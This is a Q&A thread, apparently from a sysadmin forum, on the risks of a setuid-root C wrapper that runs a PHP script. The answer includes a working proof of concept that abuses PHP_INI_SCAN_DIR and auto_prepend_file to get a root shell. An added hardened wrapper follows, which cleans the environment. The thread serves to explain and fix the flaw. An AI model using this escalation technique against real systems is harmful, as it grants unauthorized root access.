2

I have the following program in .c set as setuid chmod only read/execute by owner and will set it immutable, as I will the PHP script it invokes.

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(int argc, char *argv[] )
{
   setuid( 0 );
   execv( "/var/tools/control.php", argv );

   return 0;
}

Is this in itself a security risk? Is it possible to push other commands via argv or some other thing I didn't think of? I'm not asking about the PHP script, just this proxy program.

n00b32

1 Answer

7

Yes, it is a security risk.

$ cat <<EOF >/tmp/php.ini
auto_prepend_file=/tmp/owned.php
EOF

$ cat <<EOF >/tmp/owned.php
<?php
echo "Owned\n";
pcntl_exec("/usr/bin/sudo", array("sudo", "-i"));
?>
EOF

$ export PHP_INI_SCAN_DIR="/tmp"
$ /path/to/the/setuid/wrapper
Owned
# id
uid=0(root) gid=0(root) groups=0(root) context=staff_u:sysadm_r:sysadm_t:s0-s0:c0.c1023

And this is why you should avoid using setuid binaries.

Matthew Ife
  • Owned indeed. :) That's why I asked. For now I'll try removing all env vars, but I guess some time I'll need to eliminate the setuid altogether or do all root stuff in .c. Thanks for the PoC – n00b32 Feb 03 '14 at 23:46
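An added example, not part of the original question or answer: a variant of the wrapper that follows up on the comment about removing environment variables. It builds the child's environment from a fixed PATH plus an assumed allow-list (LANG, TERM), checks the setuid() return value, and calls execve() with that environment; the name build_clean_env and the allow-list are illustrative assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define TARGET "/var/tools/control.php"   /* script path from the question */
#define MAX_ENV 8

/* Assumed allow-list; values still come from the caller and stay untrusted. */
static const char *const KEEP[] = { "LANG", "TERM", NULL };

/* Return 1 if entry "NAME=value" has an allow-listed NAME (exact match). */
static int keep_entry(const char *entry)
{
    for (size_t i = 0; KEEP[i]; i++) {
        size_t n = strlen(KEEP[i]);
        if (strncmp(entry, KEEP[i], n) == 0 && entry[n] == '=')
            return 1;
    }
    return 0;
}

/* Fixed PATH plus allow-listed entries; everything else, PHP_INI_SCAN_DIR
 * included, is dropped. Returns the entry count, or -1 if out is too small. */
int build_clean_env(char *const in[], char *out[], size_t max)
{
    size_t n = 0;
    if (max < 2) return -1;
    out[n++] = "PATH=/usr/sbin:/usr/bin:/sbin:/bin";
    for (size_t i = 0; in && in[i]; i++) {
        if (!keep_entry(in[i])) continue;
        if (n + 1 >= max) return -1;      /* keep room for the NULL terminator */
        out[n++] = in[i];
    }
    out[n] = NULL;
    return (int)n;
}

int main(int argc, char *argv[])
{
    extern char **environ;
    char *env[MAX_ENV];
    if (argc < 1) return 1;               /* an empty argv has no argv[0] to replace */
    if (build_clean_env(environ, env, MAX_ENV) < 0) return 1;
    if (setuid(0) != 0) { perror("setuid"); return 1; }  /* never exec on failure */
    argv[0] = TARGET;                     /* do not forward a caller-chosen argv[0] */
    execve(TARGET, argv, env);
    perror("execve");                     /* only reached if exec failed */
    return 1;
}
```

With this environment the `PHP_INI_SCAN_DIR` setting from the answer never reaches the interpreter, but the remaining arguments are still forwarded as-is and must be treated as untrusted input by the script.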